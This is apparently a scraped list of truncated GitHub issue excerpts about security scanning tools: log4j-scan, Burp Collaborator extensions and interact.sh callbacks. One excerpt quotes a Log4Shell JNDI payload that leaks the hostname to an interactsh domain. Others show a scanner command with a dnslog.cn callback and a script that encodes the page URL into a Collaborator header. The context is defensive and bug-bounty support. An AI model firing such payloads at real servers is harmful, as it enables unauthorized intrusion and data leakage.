-
Using the docker image at https://github.com/christophetd/log4shell-vulnerable-app, this plug fails to detect any issues. I've tried the prebuilt jar, and even tried building myself. Same results.
-
┌──(rootbughunter)-[/opt/log4j-scan]
└─# python3 log4j-scan.py -u "http://ip:port" --dns-callback-provider dnslog.cn …
-
Taborator shows base domain only which is not ideal when there's a lot of pingbacks from the same payload. The following screenshot should serve as a reference where Collaborator is showing full domain…
-
The callback URL is being added to the query when running but no results are appearing in the web-app, does it need to be wrapped in brackets or quotes?
-
Hey there.
Just warning that someone is using interact.sh to poke my server on the new exploit on log4j.
`GET /?x=${jndi:ldap://${hostName}.c6qg2lspu892jo716f40cg4o9naya6um6.interactsh.com/a`
…
-
Move deprecated logic from notify into CLI utility within this repository.
- `biid` intercept (eg via burp upstream proxying which is cross-platform)
- collaborator interactions dump to console on u…
-
I'm trying to do something like that, e.g.
```
var URL = getUrl();
var enc = window.btoa(URL);
setRequestHeader('X-Forwarded-Host', enc + '.id.burp.net' );
```
It's to add X-Forwarded-Host: bas…
-
### Community Note
- Please vote on this issue by adding a 👍 [reaction](https://blog.github.com/2016-03-10-add-reactions-to-pull-requests-issues-and-comments/) to the original issue to help us …
-
Hi,
The extension crashes with `java.lang.IllegalStateException` when Burp Collaborator is explicitly disabled in the Project options ("Don't use Burp Collaborator" radio box) during an active scan…
tgsyn updated
3 years ago
-
### I received this email the other day, implying there was an XML security vulnerability in a /contact-us/ form on a site we run.
---
It is possible to induce the application to perform server-side…